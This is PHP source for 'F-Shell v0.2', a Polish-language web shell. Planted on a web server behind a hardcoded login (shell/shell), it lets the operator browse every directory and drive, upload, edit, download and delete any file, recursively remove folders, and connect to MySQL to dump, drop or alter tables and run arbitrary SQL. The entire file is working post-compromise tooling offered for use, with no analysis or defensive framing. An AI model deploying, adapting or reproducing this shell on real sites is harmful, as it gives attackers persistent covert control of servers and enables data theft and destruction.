<?php
/*
* F-Shell v0.2
* by Fafu
* http://rafal-brzezinski.pl
*
*/
ob_start();
session_start();
$version = 0.2;
$log = 1; // $log = 0; wylacza logowanie
$login = 'shell';
$pass = 'shell';
?>
<html>
<head>
<title><?php echo $_SERVER['HTTP_HOST']; ?> - F-Shell v<?php echo $version; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
body {
margin: 0;
padding: 0;
overflow: hidden;
}
#F-Shell {
display: block;
position: absolute;
width: 100%;
height: 100%;
top: 0;
left: 0;
z-index: 9999;
background: #000;
color: #A2A2A2;
overflow: auto;
_padding-top: 0.5%; /* IE */
text-align: center;
}
.login_form {
width: 300px;
background: #333333;
margin: 10px auto;
padding: 10px;
font-family: "Courier New", sans-serif;
font-size: 12px;
text-align: left;
border: 1px solid #A2A2A2;
}
a, a:link {
color: #D5D5D5;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
table {
background: #333;
border-collapse: collapse;
font-family: "Courier New", sans-serif;
font-size: 12px;
text-align: left;
}
td {
color: #A2A2A2;
padding: 5px;
border: 1px solid #A2A2A2;
vertical-align: top;
}
.shell_list {
width: 98%;
margin: 5px 0;
}
.shell_list td, .shell_list th {
border: 1px solid #000;
padding: 2px 5px;
}
.shell_list th {
font-weight: normal;
text-align: left;
background: #2A2A2A;
color: #A2A2A2;
}
#shell_cmd {
position: absolute;
height: 0;
width: 0;
}
input, textarea {
background: #2A2A2A;
border: 1px solid #000;
color: #A2A2A2;
padding: 3px;
margin: 0;
font-size: 12px;
font-family: "Courier New", sans-serif;'
height: auto;
width: auto;
outline: none;
}
input[type=submit], input[type=button] {
cursor: pointer;
}
p { margin: 0.3em 0; }
</style>
<script type="text/javascript">
function shell_act(action) {
if(eval("/delete/gi").test(action) > 0) {
if(!confirm('Czy napewno chcesz to usunąć?')) return;
}
var val = action + "{\n";
for(var i = 1; i < arguments.length; i++ ) {
val += arguments[i]+"\n";
}
val += "}";
document.getElementById('shell_cmd').shell_act.value = val;
document.getElementById('shell_cmd').submit();
}
</script>
</head>
<body>
<div id="F-Shell">
<?php
if(isset($_POST['shell_act'])) {
preg_match('/([^\{]+)\{(.*)}/s', $_POST['shell_act'], $m);
$m = array_map('trim', $m);
$_SESSION['shell_data'] = array_map('trim', explode("\n", $m[2]));
$_SESSION['shell_data']['act'] = $m[1];
}
if($_SESSION['shell_data']['act'] == "logout") {
unset($_SESSION['shell_logged']);
unset($_SESSION['shell_dir']);
}
if(isset($_POST['shell_login'])) {
if($_POST['shell_login'] == $login && $_POST['shell_pass'] == $pass) {
$_SESSION['shell_logged'] = true;
} else {
$err = '<p>Podałeś niepoprawne dane.</p>';
}
}
if($log == 1 && !$_SESSION['shell_logged']) {
?>
<form action="" method="post" class="login_form">
<p>Login: <input type="text" name="shell_login" size="24"></p>
<p>Hasło: <input type="password" name="shell_pass" size="24"></p>
<p><input type="submit" value="Zaloguj"></p>
<?php echo $err; ?>
</form>
<?php
} else {
?>
<form action="" method="post" id="shell_cmd"><textarea style="display:none" name="shell_act"></textarea></form>
<?php
if(!isset($_SESSION['shell_dir'])) $_SESSION['shell_dir'] = dirname(__FILE__);
@ini_set('max_execution_time',0);
@set_time_limit(9999999);
if(@get_magic_quotes_gpc()) {
foreach($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
if(isset($_FILES['shell_file']['name'])) {
move_uploaded_file($_FILES['shell_file']['tmp_name'], $_POST['shell_path'].$_POST['shell_name']);
$_SESSION['shell_dir'] = $_POST['shell_path'];
}
?>
<table border="0" cellspacing="0" cellpadding="0" style="table-layout:fixed;width:98.9%;margin: 0.5%;">
<tr>
<td width="50%" style="overflow:auto">
<?php
switch($_SESSION['shell_data']['act']) {
case "edit_file":
if(isset($_POST['shell_filedata'])) {
$filename = $_SESSION['shell_dir'].$_SESSION['shell_data'][0];
file_put_contents($filename, $_POST['shell_filedata']);
echo '<p>Zapisano do "'.$filename.'"</p>';
} else {
if(substr($_SESSION['shell_data'][0], 0, strlen($_SESSION['shell_dir'])) == $_SESSION['shell_dir']) {
$_SESSION['shell_data'][0] = substr($_SESSION['shell_data'][0], strlen($_SESSION['shell_dir']), strlen($_SESSION['shell_data'][0]));
}
echo '<form action="" method="post">
<p><textarea name="shell_filedata" spellcheck="false" style="width:100%;height:300px">'.htmlspecialchars(file_get_contents($_SESSION['shell_dir'].$_SESSION['shell_data'][0])).'</textarea></p>
<p><input type="hidden" name="shell_act" value="edit_file{'.$_SESSION['shell_data'][0].'}"><input type="submit" value="Zapisz"></p>
</form>';
}
break;
case "delete_file":
unlink($_SESSION['shell_dir'].$_SESSION['shell_data'][0]);
break;
case "download_file":
@ob_clean();
$file = $_SESSION['shell_dir'].$_SESSION['shell_data'][0];
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
readfile($file);
exit;
break;
case "delete_dir":
deltree($_SESSION['shell_dir'].$_SESSION['shell_data'][0]);
break;
case "create_dir":
$dir = explode('/', $_SESSION['shell_data'][0]);
$dirname = $dir[0].'/';
unset($dir[0]);
foreach($dir as $name) {
if(!is_dir($dirname)) {
mkdir($dirname);
}
$dirname .= $name.'/';
}
break;
case "cd":
$_SESSION['shell_dir'] .= str_replace(array('%UP%'), array('..'), $_SESSION['shell_data'][0]);
break;
case "cd2":
$_SESSION['shell_dir'] = str_replace(array('%UP%'), array('..'), $_SESSION['shell_data'][0]);
break;
case "mysql_connect":
$_SESSION['mysql_host'] = $_SESSION['shell_data'][0];
$_SESSION['mysql_user'] = $_SESSION['shell_data'][1];
$_SESSION['mysql_pass'] = $_SESSION['shell_data'][2];
$_SESSION['mysql_name'] = $_SESSION['shell_data'][3];
break;
case "mysql_close":
unset($_SESSION['mysql_host']);
unset($_SESSION['mysql_user']);
unset($_SESSION['mysql_pass']);
unset($_SESSION['mysql_name']);
break;
}
if(is_dir($_SESSION['shell_dir'])) {
$dir = chdir($_SESSION['shell_dir']);
}
$_SESSION['shell_dir'] = str_replace("\\", "/", getcwd());
if(substr($_SESSION['shell_dir'], -1) != '/') {
$_SESSION['shell_dir'] .= '/';
}
if($_SESSION['mysql_host']) {
$conn = mysql_connect($_SESSION['mysql_host'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']);
if($conn) mysql_select_db($_SESSION['mysql_name']);
}
?>
<form action="" method="post" enctype="multipart/form-data">
<p>Wgraj plik do folderu: <input type="text" value="<?php echo $_SESSION['shell_dir']; ?>" name="shell_path" size="50"></p>
<p>Nazwa: <input type="text" value="" name="shell_name" size="24"> <input type="file" name="shell_file"></p>
<p><input type="submit" value="Wyślij"></p>
</form>
<p><input type="text" size="50" id="shell_editfile" value="<?php echo $_SESSION['shell_dir']; ?>"> <input type="button" onclick="shell_act('edit_file', document.getElementById('shell_editfile').value);" value="Edytuj plik"></p>
<p><input type="text" size="50" id="shell_createdir" value="<?php echo $_SESSION['shell_dir']; ?>"> <input type="button" onclick="shell_act('create_dir', document.getElementById('shell_createdir').value);" value="Stwórz folder/y"></p>
<br>
<p>MySQL <input type="button" onclick="shell_act('mysql_connect', document.getElementById('mysql_host').value, document.getElementById('mysql_user').value, document.getElementById('mysql_pass').value, document.getElementById('mysql_name').value);" value="Połącz"> <input type="button" onclick="shell_act('mysql_close');" value="Rozłącz"><?php if($conn) { ?> <span style="color:green;font-size:25px;font-weight:bold;vertical-align:middle;line-height:10px;">•</span><?php } ?></p>
<p>Host: <input type="text" size="18" id="mysql_host" value="<?php echo $_SESSION['mysql_host']; ?>"></p>
<p>User: <input type="text" size="18" id="mysql_user" value="<?php echo $_SESSION['mysql_user']; ?>"></p>
<p>Pass: <input type="password" size="18" id="mysql_pass" value="<?php echo $_SESSION['mysql_pass']; ?>"></p>
<p>Name: <input type="text" size="18" id="mysql_name" value="<?php echo $_SESSION['mysql_name']; ?>"></p>
<?php
if($conn) { ?>
<br>
<p><input type="button" onclick="shell_act('show_tables');" value="Pokaż tabele"> <input type="button" onclick="shell_act('sql');" value="SQL CMD Line"></p>
<?php
switch($_SESSION['shell_data']['act']) {
case "show_tables";
$result = mysql_list_tables($_SESSION['mysql_name']);
$i = 0;
echo '<table class="shell_list">
<tr>
<th>Nazwa</th>
<th>Rekordów</th>
<th>Akcje</th>
</tr>';
while($row = mysql_fetch_row($result)) {
$result2 = mysql_query("SELECT Count(*) FROM `{$row[0]}`");
$count = mysql_fetch_row($result2);
echo '<tr>
<td>'.$row[0].'</td>
<td>'.$count[0].'</td>
<td><a href="javascript:shell_act(\'show_table_structure\', \''.$row[0].'\');" title="Struktura tabeli">[S]</a>
<a href="javascript:shell_act(\'show_table_records\', \''.$row[0].'\');" title="Przeglądaj">[P]</a>
<a href="javascript:shell_act(\'delete_table\', \''.$row[0].'\');" title="Usuń">[U]</a></td>
</tr>';
}
echo '</table>';
break;
case "show_table_structure":
echo '<p>Struktura tabeli: '.$_SESSION['shell_data'][0].' - <a href="javascript:shell_act(\'show_table_records\', \''.$_SESSION['shell_data'][0].'\');" title="Przeglądaj">[Przeglądaj]</a></p>';
$result = mysql_query("SHOW COLUMNS FROM `{$_SESSION['shell_data'][0]}`");
echo '<table class="shell_list" style="word-wrap:break-word;">
<tr>
<th>Kolumna</th>
<th>Typ</th>
<th>Null</th>
<th>Klucz</th>
<th>Domyślnie</th>
<th>Dodatkowo</th>
<th>Akcje</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '<tr>
<td>'.$row['Field'].'</td>
<td>'.$row['Type'].'</td>
<td>'.$row['Null'].'</td>
<td>'.$row['Key'].'</td>
<td>'.$row['Default'].'</td>
<td>'.$row['Extra'].'</td>
<td><a href="javascript:shell_act(\'delete_field\', \''.$_SESSION['shell_data'][0].'\', \''.$row['Field'].'\');" title="Usuń">[U]</a></td>
</tr>';
}
echo '</table>
<p>Nazwa: <input type="text" size="18" id="newfield_name">
Typ: <input type="text" size="18" id="newfield_type" value="int">
Domyślnie: <input type="text" size="18" id="newfield_default" value="not null"></p>
<p><input type="submit" value="Dodaj nowe pole" onclick="shell_act(\'add_field\', \''.$_SESSION['shell_data'][0].'\', document.getElementById(\'newfield_name\').value, document.getElementById(\'newfield_type\').value, document.getElementById(\'newfield_default\').value)"></p>';
break;
case "show_table_records":
echo '<p>Przeglądaj tabele: '.$_SESSION['shell_data'][0].' - <a href="javascript:shell_act(\'show_table_structure\', \''.$_SESSION['shell_data'][0].'\');" title="Struktura tabeli">[Struktura tabeli]</a></p>';
$result = mysql_query("SHOW COLUMNS FROM `{$_SESSION['shell_data'][0]}`");
$columns = array();
echo '<div style="overflow:auto;max-height:500px;"><table class="shell_list">
<tr>';
while($row = mysql_fetch_assoc($result)) {
echo '<th>'.$row['Field'].'</th>';
$columns[] = $row['Field'];
}
echo '</tr>';
$result = mysql_query("SELECT * FROM `{$_SESSION['shell_data'][0]}`");
while($row = mysql_fetch_assoc($result)) {
echo '<tr>';
foreach($columns as $col) {
echo '<td>'.$row[$col].'</td>';
}
echo '</tr>';
}
echo '</table></div>';
break;
case "delete_table":
$result = mysql_query("DROP TABLE `{$_SESSION['shell_data'][0]}`");
if($result) echo '<p>Pomyślnie usunięto tabele: '.$_SESSION['shell_data'][0].'</p>';
break;
case "delete_field":
$result = mysql_query("ALTER TABLE `{$_SESSION['shell_data'][0]}` DROP `{$_SESSION['shell_data'][1]}`");
if($result) echo '<p>Pomyślnie usunięto pole: '.$_SESSION['shell_data'][1].' w tabeli: '.$_SESSION['shell_data'][0].' - <a href="javascript:shell_act(\'show_table_structure\', \''.$_SESSION['shell_data'][0].'\');" title="Struktura tabeli">[Struktura tabeli]</a></p>';
break;
case "add_field":
$result = mysql_query("ALTER TABLE `{$_SESSION['shell_data'][0]}` ADD `{$_SESSION['shell_data'][1]}` {$_SESSION['shell_data'][2]} {$_SESSION['shell_data'][3]}");
if($result) echo '<p>Pomyślnie dodano pole: '.$_SESSION['shell_data'][1].' w tabeli: '.$_SESSION['shell_data'][0].' - <a href="javascript:shell_act(\'show_table_structure\', \''.$_SESSION['shell_data'][0].'\');" title="Struktura tabeli">[Struktura tabeli]</a></p>';
break;
case "sql":
if(isset($_POST['shell_filedata'])) {
$result = mysql_query($_POST['shell_filedata']);
if($result) echo '<p>Pomyślnie wykonano zapytanie:<br>'.$_POST['shell_filedata'].'</p>';
} else {
echo '<form action="" method="post">
<p><textarea name="shell_filedata" spellcheck="false" style="width:100%;height:100px"></textarea></p>
<p><input type="hidden" name="shell_act" value="sql{}"><input type="submit" value="Wykonaj"></p>
</form>';
}
break;
}
}
unset($_SESSION['shell_data']);
?>
</td>
<td width="50%" style="padding: 1%;">
<input type="text" value="<?php echo $_SESSION['shell_dir']; ?>" id="shell_path" size="46"> <input type="button" onclick="shell_act('cd2', document.getElementById('shell_path').value);" value="Przejdź">
<?php
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
for($j = ord('C'); $j <= ord('Z'); $j++) {
$dirname = chr($j).':/';
if(@$dh = opendir($dirname)) {
echo '<input type="button" onclick="shell_act(\'cd2\', \''.$dirname.'\');" value="'.$dirname.'"> ';
}
}
}
$dir = opendir($_SESSION['shell_dir']);
$files = array();
$folders = array();
$folders[] = '.';
$folders[] = '..';
while(false !== ($file = readdir($dir))) {
if($file != '.' && $file != '..') {
if(is_dir($_SESSION['shell_dir'].$file)) {
$folders[] = $file;
} else {
$files[] = $file;
}
}
}
asort($folders);
asort($files);
echo '<table class="shell_list">
<tr>
<th>Nazwa</th>
<th>Rozmiar</th>
<th>Uprawnienia</th>
<th>Akcje</th>
</tr>';
foreach($folders as $name) {
echo '<tr><td><a class="folder" href="javascript:shell_act(\'cd\', \''.($name == '..' ? '%UP%' : $name).'\');">['.$name.']</a></td>
<td><DIR></td>
<td>'.perms($_SESSION['shell_dir'].$name).'</td>
<td>'.($name != '.' && $name != '..' ? '<a href="javascript:shell_act(\'delete_dir\', \''.$name.'\');" title="Usuń">[U]</a>' : '---').'</td></tr>';
}
foreach($files as $name) {
echo '<tr><td><a href="javascript:shell_act(\'edit_file\', \''.$name.'\');">'.$name.'</a></td>
<td>'.view_size(@filesize($_SESSION['shell_dir'].$name)).'</td>
<td>'.perms($_SESSION['shell_dir'].$name).'</td>
<td><a href="javascript:shell_act(\'download_file\', \''.$name.'\');" title="Pobierz">[D]</a>
<a href="javascript:shell_act(\'edit_file\', \''.$name.'\');" title="Edytuj">[E]</a>
<a href="javascript:shell_act(\'delete_file\', \''.$name.'\');" title="Usuń">[U]</a></td></tr>';
}
echo '</table>';
?>
</tr>
<tr>
<td colspan="2" style="text-align:center">
F-Shell v<?php echo $version; ?> by <a href="http://rafal-brzezinski.pl">Fafu</a>
<?php if($log == 1) { ?>
- <a href="javascript:shell_act('logout');">Wyloguj się</a>
<?php } ?>
</td>
</tr>
</table>
<?php } ?>
</div>
</body>
</html>
<?php
function perms($file) {
$perms = @fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
$ea = count(explode("-",$info));
switch ($ea) {
case "0": $color="00CC00"; break;
case "1": $color="00CC00"; break;
case "2": $color="00CC00"; break;
case "3": $color="009900"; break;
case "4": $color="006600"; break;
case "5": $color="00FF00"; break;
case "6": $color="FFCC00"; break;
case "7": $color="FF9900"; break;
case "8": $color="FF6600"; break;
case "9": $color="FF3300"; break;
case "10": $color="FF0000"; break;
case "11": $color="FF0000"; break;
}
return '<span style="color:#'.$color.'">'.$info.'</span>';
}
function view_size($size) {
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function deltree($f) {
if(is_dir($f)) {
$dir = opendir($f);
while(false !== ($file = readdir($dir))) {
if($file != '.' && $file != '..') {
$sf = $f.'/'.$file;
if (is_dir($sf) && !is_link($sf)) {
deltree($sf);
} else {
unlink($sf);
}
}
}
closedir($dir);
rmdir($f);
}
}
if($conn) {
mysql_close();
}
ob_end_flush();
exit;
?>